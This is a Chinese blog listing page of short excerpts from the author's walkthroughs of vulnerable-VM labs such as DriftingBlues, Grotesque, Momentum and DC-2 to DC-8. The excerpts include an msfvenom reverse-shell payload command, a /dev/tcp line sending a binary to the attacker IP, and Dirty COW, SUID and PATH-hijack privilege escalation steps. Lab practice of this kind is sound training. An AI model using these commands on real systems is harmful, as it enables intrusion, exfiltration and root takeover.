- 博客(40)
- 收藏
- 关注
RSS订阅原创 Driftingblues靶机系列Driftingblues7
发现好多东西,web服务存在http和https,http存在80端口的https和66端口的http。Flag.txt文件。
2024-05-09 11:03:49
329
1
原创 Driftingblues靶机系列Driftingblues6
运行,访问php脚本:http://192.168.108.38/textpattern/files/phpshell.php/看到使用方法:gcc -pthread dirty.c -o dirty -lcrypt。看到只存在web服务,那么就扫描一下web。登录成功,经过对网页内容的查看下发现。一个目录,和提示存在一个zip文件。
2024-05-09 11:01:14
297
1
原创 Driftingblues靶机系列Driftingblues5
爆破出一个密码,使用https://app.keeweb.info提取kdbx文件:输入该密码。因为我们获得了kdbx的信息,有看到root下的key.sh,但是我们又不能查看key.sh。果然,就是检测keyfolder的文件夹内的文件名,如果存在则输出root的密码。没有任何东西可以使用,但是在当前用户的文件中看到:keyfile.kdbx。猜测是root的,但是我尝试了root的密码,没有一个是的。Key.sh是定时任务,而且还是1分钟左右一次。获取靶机的ip:192.168.108.37。
2024-05-09 10:59:33
181
原创 Driftingblues靶机系列Driftingblues4
获得靶机ip:192.168.108.36。发现:/usr/bin/getinfo。
2024-05-09 10:58:11
184
1
原创 Driftingblues靶机系列Driftingblues3
所以就可以实行命令劫持提权,什么意思?因为getinfo会执行ip命令,根据linux的命令执行方法,外部的命令,它会先查找环境变量的信息,没有任何文件,可以将本机的公钥传出操靶机,进行免密的登录。ssh-keygen -t rsa 然后一直回车就行。可以看到执行了一系列命令,有ip cat。看到一个robot是.txt。
2024-05-09 10:56:43
342
原创 Grotesque系列Grotesque2的靶机渗透
获取ip:获取·端口信息:扫描到ftp,ssh ,和http:访问ftp:可以进行匿名访问:获取文件:查看照片是否存在隐写:不存在隐写,那么就访问http:没有任何信息,扫描目录:扫描到登录:发现是一个wp框架的,扫描一下用户:扫描到一个用户:尝试爆破密码:爆破出了密码,进行登录:登录成功,查看一下插件可不可以进行反弹php的shell:当点击下载php插件的使用提示:修改hosts:访问:添加反弹shell的代码:本机开启4444端口的监听:
2024-05-09 10:55:35
130
原创 Grotesque系列靶机Grotesque1
keepass2john 是 John the Ripper(一种密码破解工具)中的一个插件,用于将 KeePass 数据库文件转换为 John the Ripper 可识别的格式。这些文件通常受到密码保护,并使用强大的加密算法进行加密,以确保数据的机密性和安全性。看到密码,和用户:raphael 密码: _double_trouble_看了别人的资料,他们的左上角写着密码需要大写,额为撒我的没有?看到root的密码:.:.subjective.:.所以就看了资料,接出来的密码是:chatter。
2024-05-07 19:43:21
1111
原创 Grotesque系列靶机Grotesque2
pspy64 是一个基于 Python 编写的用于监视进程活动的工具,特别用于检测隐藏进程和操作系统调用。它可以帮助您发现潜在的恶意活动或了解系统中正在运行的进程的行为。看到几个用户名:satan raphael angel distress greed lust。攻击机的IP:192.168.108.128。可以猜测,就是这个脚本进行的删除以及写入,查看源代码:可以看到一个照片连接,点击他。得到:'angel:solomon1'系统中没有安装 sudo 命令。看到rootcreds.txt。
2024-05-07 19:41:20
261
原创 Grotesque靶机系列Grotesque3
该进程中出现:每过几十秒就会以root权限执行一下/smbshare/下的所有文件。看了别人的资料后得到,需要成一个md5字典,原因是因为一个域名的网址就是md5。查看后看到home存在:home/freddie:/bin/bash。获得网址:http://192.168.108.133。获得靶机ip:192.168.108.133。使用就可以尝试爆破一下freddie。然后就实行了shell.sh。获得22 80 443端口。
2024-05-07 19:39:16
228
原创 HarryPotter系列靶机HarryPotter-Nagini
生成密钥对(默认生成路径在/root/.ssh),这里一直回车即可生成,会生成一个id_rsa(私。查看别人发的wp说:需要搭建一个http3的平台,我尝试搭建没有搭建成功,获得一个:internalResourceFeTcher.php。已经在服务器上部署了您的公钥,并将其添加到 ~/.ssh/authorized_keys 文件中。看到:http://192.168.108.220/joomla/administrator/看到/home/hermoine/bin/su_cp。
2024-05-07 15:50:25
1150
原创 HarryPotter系列靶机HarryPotter-Aragog
以普通用户身份执行 /usr/bin/bash -p 命令,Bash Shell 将会以 root 用户的权限来执行。使用exploit/multi/http/wp_file_manager_rce。仿佛这个/usr/bin/bash也不是没有用:可以给shell文件设置一个。扫描到了wordpress的manager file的漏洞。获得靶机的ip:192.168.108.234。然后执行: /usr/bin/bash -p。文件内容的意思就是将文件cp到tmp目录下。
2024-05-07 15:47:19
309
原创 星球系列靶机Venus
在登录界面中存在一个用户·和密码:guest : guest。可以看到我们的用户为guset但是我们的密码变为了thrfg。扫描到ip地址:192.168.108.141。又发现了老朋友:/usr/bin/pkexec。扫描到了8080端口的信息。可以看到发现了很多重定向。
2024-05-07 15:42:57
282
原创 星球系列靶机Mercury
在靶机上的tmp目录下载了漏洞脚本后是一个zip文件,但是使用unzip不能解压,所以可以使用在本机解压后在进行压缩为tar,而且可以看到:存在一个8080端口的http服务,还有一个ssh,而且网址是使用py脚本编辑的。获得了靶机的IP:192.168.108.142。扫描到了robots.txt。然后就可以使用tar进行解压。
2024-05-07 15:41:48
295
原创 星球系列靶机Earth
靶机监听:cat /usr/bin/reset_root > /dev/tcp/192.168.108/128/8888。找一下超级用户:find / -perm -u=s -type f 2>/dev/null。访问:https://terratest.earth.local/robots.txt。443端口的域名,以及dns:修改hosts:vim /etc/hosts。可以看到,存在80端口和443端口,可以看到访问80端口是不能访问的。可以看到:/usr/bin/reset_root。
2024-05-07 15:38:23
456
原创 Grotesque靶机系列Grotesque3
该进程中出现:每过几十秒就会以root权限执行一下/smbshare/下的所有文件。看了别人的资料后得到,需要成一个md5字典,原因是因为一个域名的网址就是md5。查看后看到home存在:home/freddie:/bin/bash。获得网址:http://192.168.108.133。获得靶机ip:192.168.108.133。使用就可以尝试爆破一下freddie。然后就实行了shell.sh。获得22 80 443端口。
2024-05-06 15:56:46
364
原创 Grotesque靶机系列Grotesque2
pspy64 是一个基于 Python 编写的用于监视进程活动的工具,特别用于检测隐藏进程和操作系统调用。它可以帮助您发现潜在的恶意活动或了解系统中正在运行的进程的行为。看到几个用户名:satan raphael angel distress greed lust。攻击机的IP:192.168.108.128。可以猜测,就是这个脚本进行的删除以及写入,查看源代码:可以看到一个照片连接,点击他。得到:'angel:solomon1'系统中没有安装 sudo 命令。看到rootcreds.txt。
2024-05-06 15:55:45
342
原创 Grotesque靶机系列Grotesque1
keepass2john 是 John the Ripper(一种密码破解工具)中的一个插件,用于将 KeePass 数据库文件转换为 John the Ripper 可识别的格式。这些文件通常受到密码保护,并使用强大的加密算法进行加密,以确保数据的机密性和安全性。看到密码,和用户:raphael 密码: _double_trouble_看了别人的资料,他们的左上角写着密码需要大写,额为撒我的没有?看到root的密码:.:.subjective.:.所以就看了资料,接出来的密码是:chatter。
2024-05-06 15:54:13
518
原创 Momentum靶机系列Momentum2
所以只需要上传一个监听代码就可以进行对靶机的监听,而且还获得了root权限:所以运行该脚本,并输入;//使用 open() 方法设置请求的类型为 POST,URL 为 "ajax.php",并指定使用异步方式发送请求(第三个参数为 true)//formData.append() 是 FormData 对象提供的方法,用于向表单数据对象中添加字段和值。简单来说就是,存在文件上传,上传的文件会添加到表单文件中 而且要想上传文件后就需要进行这串代码的过滤。//老板让我在饼干的末尾再添加一个大写字母。
2024-05-06 15:52:06
1778
原创 Momentum靶机系列Momentum1
这段代码使用了 AES 解密算法,使用了一个名为 "SecretPassphraseMomentum" 的密钥。查看了大佬的资料,他是使用了 ss -nltup 是一个在 Linux 系统中查询网络连接和监听端口信息的命令。是一个aes加密代码,进行解码,知道解码的密钥 SecretPassphraseMomentum。获得了kali的ip:192.168.13.138。看来还是不对,需要获得root的密码,或者进行夺权。获得了靶机的IP:192168.13.141。开启了22的tcp端口: ssh服务,
2024-05-06 15:50:52
283
原创 Grotesque系列Grotesque1靶机渗透
keepass2john 是 John the Ripper(一种密码破解工具)中的一个插件,用于将 KeePass 数据库文件转换为 John the Ripper 可识别的格式。这些文件通常受到密码保护,并使用强大的加密算法进行加密,以确保数据的机密性和安全性。看到密码,和用户:raphael 密码: _double_trouble_看了别人的资料,他们的左上角写着密码需要大写,额为撒我的没有?看到root的密码:.:.subjective.:.所以就看了资料,接出来的密码是:chatter。
2023-12-26 09:58:59
68
原创 Momentum系列Momentum2靶机渗透
所以只需要上传一个监听代码就可以进行对靶机的监听,而且还获得了root权限:所以运行该脚本,并输入;//使用 open() 方法设置请求的类型为 POST,URL 为 "ajax.php",并指定使用异步方式发送请求(第三个参数为 true)//formData.append() 是 FormData 对象提供的方法,用于向表单数据对象中添加字段和值。简单来说就是,存在文件上传,上传的文件会添加到表单文件中 而且要想上传文件后就需要进行这串代码的过滤。//老板让我在饼干的末尾再添加一个大写字母。
2023-12-24 12:54:20
197
1
原创 Momentum靶机渗透Momentum1
这段代码使用了 AES 解密算法,使用了一个名为 "SecretPassphraseMomentum" 的密钥。查看了大佬的资料,他是使用了 ss -nltup 是一个在 Linux 系统中查询网络连接和监听端口信息的命令。是一个aes加密代码,进行解码,知道解码的密钥 SecretPassphraseMomentum。获得了kali的ip:192.168.13.138。看来还是不对,需要获得root的密码,或者进行夺权。获得了靶机的IP:192168.13.141。开启了22的tcp端口: ssh服务,
2023-12-22 17:06:49
169
原创 [ACTF2020 新生赛]BackupFile
备份文件又www.zip 或者是.bak的扩展名,经过尝试发现:.bak是可以获得一个bak文件的。经过审计可得key必须是数字,然后还需要和str的值相同才可以。看到题目中的提示为backup备份的意思。payload为:?
2023-11-29 17:59:14
153
1
原创 driftingblues系列:driftingblues1
意思就是说,存在host文件上的隐藏信息,还给了一个字符串eric,猜测是用户名。是一个后门,使用sud命令执行了/tmp/emergency。爆破出密码为1mw4ckyyucky6。看到了/usr/bin/pkexec。
2023-11-29 17:48:11
49
1
原创 HarryPotter系列HarryPotter-Aragog
以普通用户身份执行 /usr/bin/bash -p 命令,Bash Shell 将会以 root 用户的权限来执行。使用exploit/multi/http/wp_file_manager_rce。仿佛这个/usr/bin/bash也不是没有用:可以给shell文件设置一个。扫描到了wordpress的manager file的漏洞。获得靶机的ip:192.168.108.234。然后执行: /usr/bin/bash -p。文件内容的意思就是将文件cp到tmp目录下。
2023-11-29 17:44:23
175
1
原创 HarryPotter系列HarryPotter-Nagini
查看别人发的wp说:需要搭建一个http3的平台,我尝试搭建没有搭建成功,获得一个(直接看大佬扫描的结果):internalResourceFeTcher.php。生成密钥对(默认生成路径在/root/.ssh),这里一直回车即可生成,会生成一个id_rsa(私。已经在服务器上部署了您的公钥,并将其添加到 ~/.ssh/authorized_keys 文件中。看到:http://192.168.108.220/joomla/administrator/看到/home/hermoine/bin/su_cp。
2023-11-29 17:42:13
188
1
原创 Looz靶机渗透
看到登录界面192.168.108.251:8081/wp-admin/获得一个22是ssh端口还有两个80和8081端口,还有mysql端口。存在用户gandalf,并且密码是highschoolmusical。配置好靶机的网络连接方式,本人是nat连接。看到是没有权限,查看其他的文件,也是没有。果然使用脏牛提权特可以进行获得权限。
2023-11-27 09:31:58
43
1
原创 FunBox系列FunBox_1
查看是否存在定时进程:wget下载pspy64。出现定时,监听代码写入.backup.sh。看到/usr/bin/pkexec。在funny中存在一个而执行文件。21ssh 80的http。看来不能使用pkexec。好,也没有unrar。
2023-11-26 16:05:09
20
1
原创 Deathnote的靶机渗透
生成一个反弹shell的脚本:(msfvenom -p php/meterpreter/reverse_tcp LHOST=yourip LPORT=yourport -f raw > shell.php)需要域名解析,添加:vim /etc/hosts。成功登录(只要是可以sudo提权的都可以使用)看到 l 和kira都具有很高的权限。提示需要使用cyberchef。成功登录,查看sudo权限。可以猜测是一个wp的框架。查看一下case.wav。
2023-11-26 15:59:29
36
1
原创 DC-8的靶机渗透
漏洞利用因失败而中止:不易受攻击:目标不可利用。“将强制漏洞利用设置为 true”以覆盖检查结果。Exim是一款开源的邮件传输代理(MTA),通常用于在Linux系统上发送、接收和路由电子邮件。时,模块将自动对目标进行漏洞检查,以确定目标是否易受漏洞影响。在做题的时候发现在我做wp的时候他自己退出了root,查看一下问sh文件。声明一下:kali的IP:192.168.13.138。然后将其运行:./hack.sh -m netcat。我又重新回复了一下我之前的快照,最后破解出来了。
2023-11-01 17:20:28
42
1
原创 DC-7的靶机渗透
创建用户: drush user-create username --mail=user@example.com --password="password"模块的地址:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。可以看到是久违的ssh端口还有最常见的http端口,还等什么,肯定是域名呀!查看了别人的资料,几乎都是进行了社工,原因是这个网站又一个创作者的签名。和其他的靶机差不多:是一个http://192.168.13.134。
2023-10-27 14:41:20
59
1
原创 DC-6的靶机渗透
pty.spawn("/bin/bash")' 命令的用途是在某些情况下改进当前终端的功能和体验。将使用 Bash shell 来执行其中的命令,也就是该脚本进去了虚拟终端,我们可以使用虚拟终端来控制它。9.获得了password和user的密码集,那么就可以进行爆破,可以使用burp也可以使用wpscan。dc靶机的网站:http://wordy/以及登录界面:http://wordy/wp-admin/".sh" 是Shell脚本文件的常见文件扩展名,它指示该文件是使用Shell编程语言编写的脚本。
2023-10-27 14:39:26
114
1
原创 DC-5 的靶机渗透
当一个文件被设置了 SUID 权限时,它会以文件所有者的身份而不是执行者自己的身份来执行。它的含义是在整个文件系统中搜索所有具有 SUID(Set User ID)权限的文件,并将结果输出到标准输出。他是2020版本的,而且,在/footer.php的界面中是2017版本的,它发生了变化。造成了文件包含漏洞在thankyou.php可以调用其他文件的信息,那么就好办了。可以看到下载被终止了原因是已经存在该文件,所以这个方法是可行的。调用出来了他的信息,看来真的存在,但是并没有可以登录的用户。
2023-10-24 16:20:24
59
1
原创 DC-4的靶机渗透
登录上去后在使用whoami就是root用户,在/root下就是flag,也可以使用find /-name *flag*来找flag的位置。我看了别人的wp也是这样做的,我第一次也是这样做的,当时是不需要密码的,而且在创建的时候就没有创建密码。15.登录我们创建的用户我也不知道为啥我登录不上去了,这个是我第二次做第一次做的时候是可以登录上去的。是一个登录系统,而且还自动跳出了一个用户命,那么现在就只需要获得密码就可以了。两个端口,一个是80/http一个是22端口的ssh。
2023-10-24 16:17:22
93
1
原创 DC-3渗透详细教程
还提供了漏洞的使用方法,我简单一说:就是将39774.zip下载到本机,然后在利用靶机的漏洞进行下载本机的文件,最后执行。方法:首先根据最下方的网站进行下载到本机桌面,但是这个是无法下载的于是就在网络上找到一个文件,然后在传输到kali机上。木马位置:http://192.168.13.131/templates/beez3/shell.php。靶机ip下的域名:http://192.168.13.131以及域名下的域名。获得了列名,现在就是最后一步,获得字段值:sqlmap -u "
2023-10-19 18:16:53
84
1
原创 DC-2的靶机渗透
在终端中使用 export PATH=$PATH:/usr/bin/ 命令可以将 /usr/bin/ 目录添加到环境变量 PATH 中。这样,系统将在执行命令时搜索 /usr/bin/ 目录,从而使你能够执行位于 /usr/bin/ 目录下的可执行文件。在终端中使用 export PATH=$PATH:/bin 命令可以将 /bin 目录添加到环境变量 PATH 中。这样,系统将在执行命令时搜索 /bin 目录,从而使你能够执行位于 /bin 目录下的可执行文件。翻译它:可怜的老汤姆总是追着杰瑞跑。
2023-10-18 11:32:22
58
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人